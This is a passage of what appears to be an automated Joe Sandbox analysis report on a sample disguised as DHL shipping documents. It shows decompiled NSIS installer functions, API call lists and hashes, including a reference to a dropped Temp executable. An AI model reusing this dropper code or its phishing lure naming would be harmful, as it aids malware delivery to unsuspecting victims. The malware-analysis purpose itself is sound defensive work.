                        • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                        • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                        • lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                        • SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                          • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                          • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: MessageSendlstrlen$lstrcat$TextWindow
                        • String ID: ('B
                        • API String ID: 1495540970-2332581011
                        • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                        • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                        • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                        • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                        				struct tagLOGBRUSH _v16;
                        				long _t39;
                        				long _t41;
                        				void* _t44;
                        				signed char _t50;
                        				long* _t54;
                        
                        				if(_a4 + 0xfffffecd > 5) {
                        					L18:
                        					return 0;
                        				}
                        				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                        				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                        					goto L18;
                        				} else {
                        					_t50 = _t54[5];
                        					if((_t50 & 0xffffffe0) != 0) {
                        						goto L18;
                        					}
                        					_t39 =  *_t54;
                        					if((_t50 & 0x00000002) != 0) {
                        						_t39 = GetSysColor(_t39);
                        					}
                        					if((_t54[5] & 0x00000001) != 0) {
                        						SetTextColor(_a8, _t39);
                        					}
                        					SetBkMode(_a8, _t54[4]);
                        					_t41 = _t54[1];
                        					_v16.lbColor = _t41;
                        					if((_t54[5] & 0x00000008) != 0) {
                        						_t41 = GetSysColor(_t41);
                        						_v16.lbColor = _t41;
                        					}
                        					if((_t54[5] & 0x00000004) != 0) {
                        						SetBkColor(_a8, _t41);
                        					}
                        					if((_t54[5] & 0x00000010) != 0) {
                        						_v16.lbStyle = _t54[2];
                        						_t44 = _t54[3];
                        						if(_t44 != 0) {
                        							DeleteObject(_t44);
                        						}
                        						_t54[3] = CreateBrushIndirect( &_v16);
                        					}
                        					return _t54[3];
                        				}
                        			}










                        APIs
                        • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                        • GetSysColor.USER32(00000000), ref: 00404686
                        • SetTextColor.GDI32(?,00000000), ref: 00404692
                        • SetBkMode.GDI32(?,?), ref: 0040469E
                        • GetSysColor.USER32(?), ref: 004046B1
                        • SetBkColor.GDI32(?,?), ref: 004046C1
                        • DeleteObject.GDI32(?), ref: 004046DB
                        • CreateBrushIndirect.GDI32(?), ref: 004046E5
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                        • String ID:
                        • API String ID: 2320649405-0
                        • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                        • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                        • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                        • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                        				intOrPtr _t65;
                        				intOrPtr _t66;
                        				intOrPtr _t72;
                        				void* _t76;
                        				void* _t79;
                        
                        				_t72 = __edx;
                        				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                        				_t65 = 2;
                        				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                        				_t66 = E00402D84(_t65);
                        				_t79 = _t66 - 1;
                        				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                        				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                        				if(_t79 < 0) {
                        					L36:
                        					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
                        				} else {
                        					__ecx = 0x3ff;
                        					if(__eax > 0x3ff) {
                        						 *(__ebp - 0x44) = 0x3ff;
                        					}
                        					if( *__edi == __bx) {
                        						L34:
                        						__ecx =  *(__ebp - 0xc);
                        						__eax =  *(__ebp - 8);
                        						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                        						if(_t79 == 0) {
                        							 *(_t76 - 4) = 1;
                        						}
                        						goto L36;
                        					} else {
                        						 *(__ebp - 0x38) = __ebx;
                        						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
                        						if( *(__ebp - 0x44) > __ebx) {
                        							do {
                        								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                        									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
                        										__eax = __ebp - 0x50;
                        										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                        											goto L34;
                        										} else {
                        											goto L21;
                        										}
                        									} else {
                        										goto L34;
                        									}
                        								} else {
                        									__eax = __ebp - 0x40;
                        									_push(__ebx);
                        									_push(__ebp - 0x40);
                        									__eax = 2;
                        									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                        									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                        									if(__eax == 0) {
                        										goto L34;
                        									} else {
                        										__ecx =  *(__ebp - 0x40);
                        										if(__ecx == __ebx) {
                        											goto L34;
                        										} else {
                        											__ax =  *(__ebp + 0xa) & 0x000000ff;
                        											 *(__ebp - 0x4c) = __ecx;
                        											 *(__ebp - 0x50) = __eax;
                        											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                        												L28:
                        												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
                        											} else {
                        												__ebp - 0x50 = __ebp + 0xa;
                        												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                        													L21:
                        													__eax =  *(__ebp - 0x50);
                        												} else {
                        													__edi =  *(__ebp - 0x4c);
                        													__edi =  ~( *(__ebp - 0x4c));
                        													while(1) {
                        														_t22 = __ebp - 0x40;
                        														 *_t22 =  *(__ebp - 0x40) - 1;
                        														__eax = 0xfffd;
                        														 *(__ebp - 0x50) = 0xfffd;
                        														if( *_t22 == 0) {
                        															goto L22;
                        														}
                        														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                        														__edi = __edi + 1;
                        														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                        														__eax = __ebp + 0xa;
                        														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                        															continue;
                        														} else {
                        															goto L21;
                        														}
                        														goto L22;
                        													}
                        												}
                        												L22:
                        												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                        													goto L28;
                        												} else {
                        													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                        														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                        															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                        															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                        														} else {
                        															__ecx =  *(__ebp - 0xc);
                        															__edx =  *(__ebp - 8);
                        															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                        															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                        														}
                        														goto L34;
                        													} else {
                        														__ecx =  *(__ebp - 0xc);
                        														__edx =  *(__ebp - 8);
                        														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                        														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                        														 *(__ebp - 0x38) = __eax;
                        														if(__ax == __bx) {
                        															goto L34;
                        														} else {
                        															goto L26;
                        														}
                        													}
                        												}
                        											}
                        										}
                        									}
                        								}
                        								goto L37;
                        								L26:
                        								__eax =  *(__ebp - 8);
                        							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                        						}
                        						goto L34;
                        					}
                        				}
                        				L37:
                        				return 0;
                        			}









                        APIs
                        • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                          • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: File$Pointer$ByteCharMultiWide$Read
                        • String ID: 9
                        • API String ID: 163830602-2366072709
                        • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                        • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                        • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                        • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E004068EF(WCHAR* _a4) {
                        				short _t5;
                        				short _t7;
                        				WCHAR* _t19;
                        				WCHAR* _t20;
                        				WCHAR* _t21;
                        
                        				_t20 = _a4;
                        				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                        					_t20 =  &(_t20[4]);
                        				}
                        				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
                        					_t20 =  &(_t20[2]);
                        				}
                        				_t5 =  *_t20;
                        				_t21 = _t20;
                        				_t19 = _t20;
                        				if(_t5 != 0) {
                        					do {
                        						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
                        							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                        							_t19 = CharNextW(_t19);
                        						}
                        						_t20 = CharNextW(_t20);
                        						_t5 =  *_t20;
                        					} while (_t5 != 0);
                        				}
                        				 *_t19 =  *_t19 & 0x00000000;
                        				while(1) {
                        					_push(_t19);
                        					_push(_t21);
                        					_t19 = CharPrevW();
                        					_t7 =  *_t19;
                        					if(_t7 != 0x20 && _t7 != 0x5c) {
                        						break;
                        					}
                        					 *_t19 =  *_t19 & 0x00000000;
                        					if(_t21 < _t19) {
                        						continue;
                        					}
                        					break;
                        				}
                        				return _t7;
                        			}









                        APIs
                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                        • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                        • CharNextW.USER32(?,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                        • CharPrevW.USER32(?,?,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Char$Next$Prev
                        • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                        • API String ID: 589700163-2982765560
                        • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                        • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                        • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                        • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040302E(intOrPtr _a4) {
                        				short _v132;
                        				long _t6;
                        				struct HWND__* _t7;
                        				struct HWND__* _t15;
                        
                        				if(_a4 != 0) {
                        					_t15 =  *0x420efc;
                        					if(_t15 != 0) {
                        						_t15 = DestroyWindow(_t15);
                        					}
                        					 *0x420efc = 0;
                        					return _t15;
                        				}
                        				if( *0x420efc != 0) {
                        					return E00406A71(0);
                        				}
                        				_t6 = GetTickCount();
                        				if(_t6 >  *0x42a26c) {
                        					if( *0x42a268 == 0) {
                        						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
                        						 *0x420efc = _t7;
                        						return ShowWindow(_t7, 5);
                        					}
                        					if(( *0x42a314 & 0x00000001) != 0) {
                        						wsprintfW( &_v132, L"... %d%%", E00403012());
                        						return E004056CA(0,  &_v132);
                        					}
                        				}
                        				return _t6;
                        			}








                        APIs
                        • DestroyWindow.USER32(?,00000000), ref: 00403049
                        • GetTickCount.KERNEL32 ref: 00403067
                        • wsprintfW.USER32 ref: 00403095
                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                          • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                          • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                          • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                        • CreateDialogParamW.USER32 ref: 004030B9
                        • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                          • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                        • String ID: ... %d%%
                        • API String ID: 722711167-2449383134
                        • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                        • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                        • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                        • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
                        				long _v8;
                        				signed char _v12;
                        				unsigned int _v16;
                        				void* _v20;
                        				intOrPtr _v24;
                        				long _v56;
                        				void* _v60;
                        				long _t15;
                        				unsigned int _t19;
                        				signed int _t25;
                        				struct HWND__* _t28;
                        
                        				_t28 = _a4;
                        				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                        				if(_a8 == 0) {
                        					L4:
                        					_v56 = _t15;
                        					_v60 = 4;
                        					SendMessageW(_t28, 0x113e, 0,  &_v60);
                        					return _v24;
                        				}
                        				_t19 = GetMessagePos();
                        				_v16 = _t19 >> 0x10;
                        				_v20 = _t19;
                        				ScreenToClient(_t28,  &_v20);
                        				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                        				if((_v12 & 0x00000066) != 0) {
                        					_t15 = _v8;
                        					goto L4;
                        				}
                        				return _t25 | 0xffffffff;
                        			}















                        APIs
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                        • GetMessagePos.USER32 ref: 00404FA2
                        • ScreenToClient.USER32 ref: 00404FBC
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Message$Send$ClientScreen
                        • String ID: f
                        • API String ID: 41195575-1993550816
                        • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                        • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                        • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                        • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                        				short _v132;
                        				void* _t11;
                        				WCHAR* _t19;
                        
                        				if(_a8 == 0x110) {
                        					SetTimer(_a4, 1, 0xfa, 0);
                        					_a8 = 0x113;
                        				}
                        				if(_a8 == 0x113) {
                        					_t11 = E00403012();
                        					_t19 = L"unpacking data: %d%%";
                        					if( *0x42a270 == 0) {
                        						_t19 = L"verifying installer: %d%%";
                        					}
                        					wsprintfW( &_v132, _t19, _t11);
                        					SetWindowTextW(_a4,  &_v132);
                        					SetDlgItemTextW(_a4, 0x406,  &_v132);
                        				}
                        				return 0;
                        			}







                        APIs
                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                        • wsprintfW.USER32 ref: 00402FE5
                        • SetWindowTextW.USER32(?,?), ref: 00402FF5
                        • SetDlgItemTextW.USER32 ref: 00403007
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Text$ItemTimerWindowwsprintf
                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                        • API String ID: 1451636040-1158693248
                        • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                        • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                        • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                        • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E00402950(void* __ebx) {
                        				WCHAR* _t26;
                        				void* _t29;
                        				long _t37;
                        				void* _t49;
                        				void* _t52;
                        				void* _t54;
                        				void* _t56;
                        				void* _t59;
                        				void* _t60;
                        				void* _t61;
                        
                        				_t49 = __ebx;
                        				_t52 = 0xfffffd66;
                        				_t26 = E00402DA6(0xfffffff0);
                        				_t55 = _t26;
                        				 *(_t61 - 0x40) = _t26;
                        				if(E00405FAE(_t26) == 0) {
                        					E00402DA6(0xffffffed);
                        				}
                        				E00406133(_t55);
                        				_t29 = E00406158(_t55, 0x40000000, 2);
                        				 *(_t61 + 8) = _t29;
                        				if(_t29 != 0xffffffff) {
                        					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                        					if( *(_t61 - 0x28) != _t49) {
                        						_t37 =  *0x42a274;
                        						 *(_t61 - 0x44) = _t37;
                        						_t54 = GlobalAlloc(0x40, _t37);
                        						if(_t54 != _t49) {
                        							E004035F8(_t49);
                        							E004035E2(_t54,  *(_t61 - 0x44));
                        							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                        							 *(_t61 - 0x10) = _t59;
                        							if(_t59 != _t49) {
                        								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                        								while( *_t59 != _t49) {
                        									_t51 =  *_t59;
                        									_t60 = _t59 + 8;
                        									 *(_t61 - 0x3c) =  *_t59;
                        									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                        									_t59 = _t60 +  *(_t61 - 0x3c);
                        								}
                        								GlobalFree( *(_t61 - 0x10));
                        							}
                        							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                        							GlobalFree(_t54);
                        							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                        						}
                        					}
                        					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                        					CloseHandle( *(_t61 + 8));
                        				}
                        				_t56 = 0xfffffff3;
                        				if(_t52 < _t49) {
                        					_t56 = 0xffffffef;
                        					DeleteFileW( *(_t61 - 0x40));
                        					 *((intOrPtr*)(_t61 - 4)) = 1;
                        				}
                        				_push(_t56);
                        				E00401423();
                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
                        				return 0;
                        			}














                        APIs
                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
